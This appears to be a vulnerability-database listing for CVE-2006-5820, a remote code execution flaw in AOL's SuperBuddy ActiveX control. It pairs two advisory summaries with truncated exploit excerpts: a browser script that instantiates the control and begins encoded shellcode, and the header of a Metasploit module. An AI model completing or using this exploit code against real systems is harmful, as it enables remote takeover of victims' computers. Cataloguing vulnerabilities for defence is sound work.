AOL 9.1 SuperBuddy ActiveX Control remote code execution

No description provided by source. script language=vbscript Set obj = CreateObject"Sb.SuperBuddy.1" /script script language=javascript shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +...

AOL SuperBuddy ActiveX Control Remote Code Execution Exploit (meta)

No description provided by source. require 'msf/core' module Msf class Exploits::Windows::Browser::AOLSuperBuddyLinkSBIcons 'AOL Sb.Superbuddy vulnerability', 'Description' = %q This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module. ,...

CVE-2006-5820

The LinkSBIcons method in the SuperBuddy ActiveX control Sb.SuperBuddy.1 in America Online 9.0 Security Edition dereferences an arbitrary function pointer, which allows remote attackers to execute arbitrary code via a modified pointer value...

CVE-2006-5820

Summary (CVE-2006-5820): AOL's SuperBuddy ActiveX control (Sb.SuperBuddy.1) exposes the LinkSBIcons() method. The vulnerability arises when an attacker-provided address is dereferenced as a function pointer, enabling remote code execution. Impact is remote, unauthenticated, requiring a user to vi...